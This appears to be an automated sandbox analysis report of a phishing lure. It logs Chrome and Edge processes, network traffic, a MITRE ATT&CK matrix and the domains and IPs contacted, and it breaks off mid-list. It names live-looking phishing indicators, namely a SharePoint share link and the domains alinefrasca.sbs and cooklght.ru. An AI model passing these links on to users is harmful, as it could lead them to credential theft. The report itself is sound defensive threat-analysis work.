Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49948 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.17:49992 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.win@85/236@60/362
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\20fbbf5d-aab3-4574-b5f8-c250c4a4835a.tmp
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,9301838728997033839,5784938270291284048,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,9301838728997033839,5784938270291284048,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url -- "C:\Users\user\Downloads\Drawing 1.vsdx"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1980,i,4769699315146686337,1796002590068579978,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate -- "C:\Users\user\Downloads\Drawing 1.vsdx"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6468 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=6828 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8036 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url -- "C:\Users\user\Downloads\Drawing 1.vsdx"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url -- "C:\Users\user\Downloads\Drawing 1.vsdx"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2036,i,10329489673553820088,5807421228779117729,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8652 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1980,i,4769699315146686337,1796002590068579978,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6468 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=6828 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8652 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8036 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url -- "C:\Users\user\Downloads\Drawing 1.vsdx"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8652 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2036,i,10329489673553820088,5807421228779117729,262144 /prefetch:3
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
AI detected landing page (webpage, office document or email)
Source: https://dzentec-my.sharepoint.com/personal/i_lahmer_entec-dz_com/_layouts/15/Doc.aspx?sourcedoc=%7B8ce429d6-fa50-49ec-8af9-cf02a4b3bf8d%7D&action=default&slrid=c0435fa1-1082-0000-2d67-d62c612b4258&originalPath=aHR0cHM6Ly9kemVudGVjLW15LnNoYXJlcG9pbnQuY29tLzp1Oi9nL3BlcnNvbmFsL2lfbGFobWVyX2VudGVjLWR6X2NvbS9FZFlwNUl4US11eEppdm5QQXFTenY0MEJaaUNYN3NwaHo3S2o4SkR5UkJLcXBRP3J0aW1lPV9ZTVZhWlQ1M0Vn&CID=2afa1aa9-0319-40b6-a9ad-adc2c010190c&_SRM=0:G:68LLM: Page contains button: 'VIEW DOCUMENT' Source: '1.0.pages.csv'
Source: https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?rtime=_YMVaZT53EgLLM: Page contains button: 'VIEW DOCUMENT' Source: '2.1.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Browser Extensions		1
Process Injection		1
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting		1
Registry Run Keys / Startup Folder		1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder		1
Extra Window Memory Injection		1
Deobfuscate/Decode Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
162.159.61.3
truefalse
    		unknown
    dual-spo-0005.spo-msedge.net
    		13.107.136.10
    		truefalse
      		unknown
      a.nel.cloudflare.com
      		35.190.80.1
      		truefalse
        		unknown
        cooklght.ru
        		172.67.222.24
        		truefalse
          		unknown
          ssl.bingadsedgeextension-prod-europe.azurewebsites.net
          		94.245.104.56
          		truefalse
            		unknown
            s-part-0017.t-0009.t-msedge.net
            		13.107.246.45
            		truefalse
              		unknown
              wac-0003.wac-dc-msedge.net
              		52.108.11.12
              		truefalse
                		unknown
                sni1gl.wpc.nucdn.net
                		152.199.21.175
                		truefalse
                  		unknown
                  200073-ipv4v6.farm.dprodmgd107.aa-rt.sharepoint.com
                  		52.105.169.25
                  		truefalse
                    		unknown
                    wac-0003.wac-msedge.net
                    		52.108.9.12
                    		truefalse
                      		unknown
                      cdnjs.cloudflare.com
                      		104.17.24.14
                      		truefalse
                        		unknown
                        challenges.cloudflare.com
                        		104.18.95.41
                        		truefalse
                          		unknown
                          www.google.com
                          		142.250.186.100
                          		truefalse
                            		unknown
                            alinefrasca.sbs
                            		188.114.96.3
                            		truefalse
                              		unknown
                              googlehosted.l.googleusercontent.com
                              		172.217.16.129
                              		truefalse
                                		unknown
                                euc-common.online.office.com
                                		unknown
                                		unknownfalse
                                  		unknown
                                  cdn.jsdelivr.net
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    visioonline.nel.measure.office.net
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      storage.live.com
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        clients2.googleusercontent.com
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          bzib.nelreports.net
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            common.online.office.com
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              dzentec-my.sharepoint.com
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                messaging.engagement.office.com
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://dzentec-my.sharepoint.com/personal/i_lahmer_entec-dz_com/_layouts/15/Doc.aspx?sourcedoc=%7B8ce429d6-fa50-49ec-8af9-cf02a4b3bf8d%7D&action=default&slrid=c0435fa1-1082-0000-2d67-d62c612b4258&originalPath=aHR0cHM6Ly9kemVudGVjLW15LnNoYXJlcG9pbnQuY29tLzp1Oi9nL3BlcnNvbmFsL2lfbGFobWVyX2VudGVjLWR6X2NvbS9FZFlwNUl4US11eEppdm5QQXFTenY0MEJaaUNYN3NwaHo3S2o4SkR5UkJLcXBRP3J0aW1lPV9ZTVZhWlQ1M0Vn&CID=2afa1aa9-0319-40b6-a9ad-adc2c010190c&_SRM=0:G:68true
                                                    		unknown
                                                    https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?rtime=_YMVaZT53Egtrue
                                                      		unknown
                                                      https://alinefrasca.sbs/pktcr/true
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        13.107.6.156
                                                        		unknownUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        2.20.245.134
                                                        		unknownEuropean Union
                                                        		20940AKAMAI-ASN1EUfalse
                                                        13.107.6.158
                                                        		unknownUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        52.178.17.3
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        13.107.246.45
                                                        		s-part-0017.t-0009.t-msedge.netUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        20.189.173.2
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        52.108.9.12
                                                        		wac-0003.wac-msedge.netUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        162.159.61.3
                                                        		chrome.cloudflare-dns.comUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        52.109.136.6
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        204.79.197.239
                                                        		unknownUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        35.190.80.1
                                                        		a.nel.cloudflare.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        172.67.222.24
                                                        		cooklght.ruUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        51.116.253.169
                                                        		unknownUnited Kingdom
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        52.108.52.53
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        23.38.98.96
                                                        		unknownUnited States
                                                        		16625AKAMAI-ASUSfalse
                                                        104.21.91.145
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        104.18.186.31
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        13.107.21.239
                                                        		unknownUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        104.18.95.41
                                                        		challenges.cloudflare.comUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        13.107.42.16
                                                        		unknownUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        216.58.206.46
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        239.255.255.250
                                                        		unknownReserved
                                                        		unknownunknownfalse
                                                        2.19.126.152
                                                        		unknownEuropean Union
                                                        		16625AKAMAI-ASUSfalse
                                                        142.250.185.195
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        142.250.186.142
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        142.250.186.100
                                                        		www.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        20.190.160.20
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        142.250.186.42
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        23.38.98.70
                                                        		unknownUnited States
                                                        		16625AKAMAI-ASUSfalse
                                                        13.107.136.10
                                                        		dual-spo-0005.spo-msedge.netUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        104.18.94.41
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        152.195.19.97
                                                        		unknownUnited States
                                                        		15133EDGECASTUSfalse
                                                        52.182.143.214
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        20.189.173.17
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        104.208.16.91
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        40.126.31.67
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        52.105.169.25
                                                        		200073-ipv4v6.farm.dprodmgd107.aa-rt.sharepoint.comUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        23.38.98.111
                                                        		unknownUnited States
                                                        		16625AKAMAI-ASUSfalse
                                                        23.38.98.75
                                                        		unknownUnited States
                                                        		16625AKAMAI-ASUSfalse
                                                        2.16.241.83
                                                        		unknownEuropean Union
                                                        		20940AKAMAI-ASN1EUfalse
                                                        13.104.208.160
                                                        		unknownUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        2.16.241.80
                                                        		unknownEuropean Union
                                                        		20940AKAMAI-ASN1EUfalse
                                                        172.64.41.3
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        142.250.186.138
                                                        		unknownUnited States
                                                        		15169GOOGLEUSfalse
                                                        52.113.194.132
                                                        		unknownUnited States
                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        104.17.24.14
                                                        		cdnjs.cloudflare.comUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        23.38.98.83
                                                        		unknownUnited States
                                                        		16625AKAMAI-ASUSfalse
                                                        2.23.209.136
